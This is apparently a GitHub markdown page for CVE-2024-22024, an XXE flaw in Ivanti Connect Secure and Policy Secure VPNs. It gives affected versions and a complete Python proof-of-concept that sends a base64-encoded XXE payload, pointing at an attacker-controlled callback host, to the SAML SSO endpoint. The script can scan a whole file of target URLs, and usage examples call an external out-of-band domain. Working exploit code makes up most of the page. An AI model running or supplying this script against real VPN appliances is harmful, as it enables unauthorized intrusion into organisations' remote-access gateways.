Skip to content

Latest commit

 

History

History
102 lines (72 loc) · 3.55 KB

CVE-2024-22024.md

File metadata and controls

102 lines (72 loc) · 3.55 KB
Raw

Ivanti Pulse Connect Secure VPN存在XXE漏洞(CVE-2024-22024)

Ivanti Pulse Connect Secure VPN存在XXE漏洞,攻击者可构造恶意请求触发XXE,结合相关功能造成远程代码执行。

影响范围

  • ivanti connect_secure 22.4
  • ivanti connect_secure 22.5
  • ivanti connect_secure 9.1
  • ivanti policy_secure 22.5
  • ivanti zero_trust_access 22.6

poc

import base64
import requests
import argparse
from pathlib import Path
import urllib3
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single InsecureRequestWarning from urllib3
urllib3.disable_warnings(InsecureRequestWarning)

'''
	PoC by Abdulla
	CVE-2024-22024 (XXE) for Ivanti Connect Secure and Ivanti Policy Secure
	Remediation:
	https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
'''

def send_request(target_url, attacker_url, timeout):
    xml_payload_template = """<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "{}"> %xxe;]><r></r>"""
    xml_payload = xml_payload_template.format(attacker_url + "/test")  # Format with the provided external URL
    encoded_payload = base64.b64encode(xml_payload.encode()).decode()  # Encode in base64
    data = {'SAMLRequest': encoded_payload}  # Data for POST request
    
    # Attempt the POST request with the specified timeout
    try:
        response = requests.post(target_url+"/dana-na/auth/saml-sso.cgi", data=data, verify=False, timeout=timeout)
        print(f"Response from {target_url}: {response.status_code}")
    except requests.exceptions.Timeout:
        print(f"Request to {target_url} timed out.")
    except Exception as e:
        print(f"Error sending request to {target_url}.")

def main(target_urls, attacker_url, timeout):
    if Path(target_urls).is_file():  # If target_urls is a file path
        with open(target_urls, 'r') as file:
            urls = file.read().splitlines()
            for url in urls:
                send_request(url, attacker_url, timeout)
    else:  # Assume target_urls is a single URL
        send_request(target_urls, attacker_url, timeout)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure by Abdulla.")
    parser.add_argument("-u", "--target_url", required=True, help="The target URL or file with URLs where the SAML request should be sent")
    parser.add_argument("-c", "--attacker_url", required=True, help="The attacker URL to include in the XXE payload")
    parser.add_argument("-t", "--timeout", type=int, default=3, help="Timeout in seconds for the request (default is 3 seconds)")
    args = parser.parse_args()
    
    main(args.target_url, args.attacker_url, args.timeout)

Parameters

  • -u or --target_url: The target Ivanti Connect Secure (ICS) URL or file with list of URLs.
  • -c or --attacker_url: The attacker URL (generate one using Burp Collaborator, ngrok, or by using a unique URL from Webhook.site)
  • -t or --timeout: Timeout in seconds for the request (default is 3 seconds)

How to use

Testing a single URL:

python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com

Testing list of URLs:

python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com

Using a different timeout (5 seconds):

python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5

漏洞来源